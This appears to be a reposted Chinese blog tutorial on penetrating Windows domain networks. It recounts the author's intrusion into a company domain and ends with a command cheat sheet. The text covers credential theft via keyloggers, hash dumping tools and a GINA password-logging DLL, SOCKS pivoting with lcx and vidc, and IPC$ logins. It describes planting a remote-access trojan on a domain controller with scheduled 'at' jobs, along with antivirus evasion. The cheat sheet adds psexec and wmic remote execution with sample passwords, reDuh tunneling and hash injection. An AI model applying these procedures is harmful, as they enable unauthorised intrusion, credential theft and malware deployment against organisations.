域內網滲透小結

1.收集信息
1-1.不論什么途徑獲得的內網機器,確定他在內網后,我們首先就要了解這臺機器的所屬人員,如果我們的目標是公司,那我們就要了解這個人在公司里的職位,他是個什么身份,有多大的權利,這都關系到他在內網里的權限。因為,作為大公司,一個高權限的人他在內網里所要用到的東西就多,那么相對他的機器,當然權限就會比一般普通員工的高很多,這在我的滲透過程中是常見的。
既然有了他的機器,那么翻翻他的電腦這是必要的,如果你說要怎么翻,你可以嘗試熟悉他的電腦甚至比他本人還熟,那你就算了解詳細了。一臺個人用的電腦,從上面翻出與他自己相關的一些信息,和大量公司信息應該是沒有問題的,除非,這是臺新電腦。
1-2.了解了一定的人員信息,期間你要記下你所掌握到的賬號,密碼這些重要數據,以后有一定的用,所以,在你滲之前,不妨建個記事本將重要信息保存起來,寫個記事本不會浪費你多少時間。接下來,我們就應該對這個網絡進行一定的了解,他是一般的內網,還是域?一般大公司都會用域的,我們只需要查一下就知道,要想對他進行滲透,你就必須了解他的網絡拓補,當然,一些太具體的物理上我們是無法了解的,我們只能了解我們所能知道的。不管他是INT,DMZ,LAN,我們必須足夠掌握。在這,我們就會用到一定的命令,相信大家應該都很熟悉。
ipconfig /all 查詢一下本機的一些情況,IP段 網關 屬于不屬于域
net view 查詢一些存在聯系的機器,一般以機器名顯示,我們需要對其PING出IP,一是方便查詢哪些重要機器的IP,二是方便查詢存在幾個段
net view /domain 查詢有幾個域 因為大型網絡里面一般不止一個域的
net group /domain 查詢域里面的組
net user /domain 查詢域用戶
net group “domain admins” /domain 查詢域管理用戶組
這些都是我們需要了解的,當然有時候還會需要再查詢一些信息,NET命令下你們都會找到,不需要我再重復,具體的情況具體分析問題。
2.信息歸檔
2-1。有了信息,我們就要對信息進行一定的歸檔,將每個機器名所對應的IP歸檔,方便用時不會亂。
2-2。查詢出的用戶,管理員,我們也必須歸檔。
2-3。查詢信息時可能出現的有利用價值信息必須歸檔。
3.技術利用
3-1。不論是通過鍵盤記錄。或者HASH的抓取,我們需要將賬號,密碼,郵箱,凡是涉及關鍵數據的全部保存,一方面是準備滲透的資料,二是防止當前利用機器會掉。
3-1-1。利用遠控的鍵盤記錄進行抓取。
3-1-2。利用PWDUMP7或者GETHASHES進行抓取HASH,然后破解。GETHASHES V1.4后 可以抓取域的全部HASH。
3-1-3。用GINASTUB.DLL獲取管理員的賬號和密碼。因為域管理員有權限登陸任何一臺機器。種上這個只是方便記錄他所登陸的密碼。INSTALL后,會在SYSYTEM32下生成一個 FAXMODE.INC 文件記錄密碼。
3-2。有了內網,很多東西我們是沒有必要直接在當前利用機器上操作的,別人雖然是內網,但是不代表他沒有防御系統,所以,我們建立SOCKS或者VPN是很有必要的,建立SOCKS相信大家都會了吧。
3-2-1。我在這推薦 VIDC 這個工具,很方便,在CMD下直接操 VIDC.EXE -D -P PORT 就可以了。
3-2-2。在利用機器上使用LCX,CMD下 LCX.EXE -SLAVE 服務器IP PORT 127.0.0.1 PORT,然后到服務器上 CMD下 LCX.EXE -LISTEN 服務器IP PORT 任意PORT。
3-2-3。建立SOCKS后在本地可以用SOCKSCAP來進行連接,成功連接后該操作什么就看你們自己了。
基本上我們就只能操作這么多了,后面已經沒有什么技術上的再使用或利用,但是這中間的經驗不少,所需要處理的細節也不少。
我們在得到內網機器后,如果他存在域,但是沒有使用域賬號怎么辦?那我們只能查詢或者想盡一切手段獲得他常用的賬號密碼,然后利用這個賬號密碼,再通過SOCKS進入域。這其中就關系到各位同行查看控制機器的文件,還有記錄密碼,GINA,HASH破解,這些都是必須的。
進入域后,我們又該怎么做,建立SOCKS后又該怎么做。我們可以扔S上去查看主要的端口,我們可以對端口進行弱口令的嘗試,我們可以針對內網的WEB進行檢測,方式很多,甚至你可以用MS08-067對另一臺機器進行突破,但是相信我,能使用域的機器,大部分都是補丁打齊的。我們能利用的很少,但是不能灰心,只要能在內網穿梭,我們至少在防御上會輕松很多,我們需要的只是耐心和時間。
一旦擁有密碼,我們就可以嘗試IPC連接,直接拿下域,這就得看你們的權限有多大。
net use [url=file://ip/ipc$]IPipc$[/url] password /user:username@domain
推薦使用這樣的方式輸入賬號和密碼,為什么?如果用戶名存在空格,你這樣輸會保險些。什么 域用戶不能存在空格?
是的,以前我也認為不會,微軟的講師也說不會,不過,經過我的測試和經驗,那是假的,域 完全可以空格,除了 user name 這樣的,還可以存在 user na me ,不信 你可以試試。
建立IPC后,你只是想COPY文件 或者 RAR文件 再或者種馬 那就是你的自由了。
后話:最近因為在滲域,在滲透過程中,也確實出現一些問題,幾次都是不知如何進行,其實在技術上,并沒有什么障礙。主要是在于對方有著比較強的主防御,而我的遠控最開始連CMD都無法執行,后經過幾天的環境測試,突破了CMD。有了CMD后,進行了查詢,獲得了一些信息,就開始了往下的滲透,被控機器的密碼我不是跑出來的,我是翻他的文件翻出他常用密碼的。因為他沒有使用域賬號,都是以系統賬號登陸,所以無法查看域。我只能用他的域賬號建立IPC連接,查找到內網的一個WEB服務,將其滲透后才算拿下了一個穩定的內網機器。
拿下內網WEB服務器后,我就已經完全在域內,沒有使用HASH INJECTION,我是先查詢了DOMAIN ADMINS,發現WEB服務器上的賬號就屬于這個組,PW后得到了HASH,破解掉我就連向了域控服務器的IPC$。
連接了IPC$,直接在其SYSYTEM32下扔了一個遠控,然后用AT命令將其啟動,這期間我嘗試了5個SHIFT,但是SHIFT關閉后,我的遠控也會掉,所以排除了這種方法,還是用AT來ADD NEW JOB 比較方便。
給域控服務器種了遠控,利用CMD來GETHASHES了全部的HASHES進行破解,很幸運的查到了文件管理組的用戶,這才有了我后面的目標達成。
總的來說,我這次的滲透比較運氣好,中間麻煩事不是太多,不過也花了半個月的時間,時間大部分花在測試防御環境,軟件免殺,木馬免殺,查找資料這些上面。
后來,我獲取了他的網絡拓補圖,發現我所呆的區域只是一個小小的域,還有好幾個域我還沒有涉及到,在域的前面是DMZ,而DMZ前面當然是INT了。
已經很晚了,本來是在寫一份詳細的滲透過程,不過因為一直工作,很多細節沒有辦法當場記錄,所以,暫時在BLOG上寫一些能想到的,后面如果有時間有環境,會再補充更多的細節以及圖片和在滲透時所遇到的麻煩,如何解決等寫出來。
———————————————————————————————-
常用命令
net view
查看同一域/工作組的計算機列表
net view /domain
查看域/工作組列表
net view /domain:Secwing
查看Secwing域中 計算機列表
net group /domain
查看所在域的組
net user /domain
查看所在域用戶
net user /domain zerosoul 12345678
修改域用戶密碼,需要域管理員權限,或者Ctrl+Alt+Del點擊修改則不需要域管理員權限
net localgroup administrators SECWINGzerosoul /add
域Users組用戶添加到本地Administrators組,需要本地管理員或域管理員在本機登陸域后進行
下面的命令 只能用于 域控制器:
net group “Domain controllers”
查看域控制器(如果有多臺)
net group
查看域的組
net group “domain admins”
查看域管理員
net group “domain users”
查看域管理員
PS:打開配置域控制器向導的命令
dcpromo
psexec /accepteula 繞過第一次驗證窗口
mstsc/admin 解決hash無法抓出問題
wmic /node:172.16.19.96 /user:ABIMAQAdministrator /password:k78m90 process call create c:kav2009.exe
psexec.exe -s -u administrator -p k78m90 [url=file://172.16.16.2/]172.16.16.2[/url] -c c:kav2009.exe 拷貝文件并且執行
psexec.exe -s -u administrator -p km3h7i [url=file://172.16.16.2/]172.16.16.2[/url] -c c:kavgsecdump.exe -u 抓取hash
net use [url=file://172.16.16.2/IPC$]172.16.16.2IPC$[/url] “k78m90″ /user:”admintitrator”
net use [url=file://172.16.16.2/IPC$]172.16.16.2IPC$[/url] “k78m90″ /user:”aABIMAQAdministrator”
net time [url=file://172.16.16.2/]172.16.16.2[/url]
at [url=file://172.16.16.2/]172.16.16.2[/url] 13:50 2009.exe
java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh連接命令
[createTunnel]1234:127.0.0.1:3389 端口轉向命令
iam-alt -h user-hash 這樣hash就被注入了
whosthere-alt.exe 來查看是否被注入成功。

如果你現在正在滲透一個域或者是內網想學習更深入的滲透方式,可以參考《常規內網滲透思路總結》《域內特定目標滲透方法概要

本文責任編輯:Mr.Lonely

轉自網絡網絡安全攻防研究室(www.szcgpp.com)信息安全小組收集整理。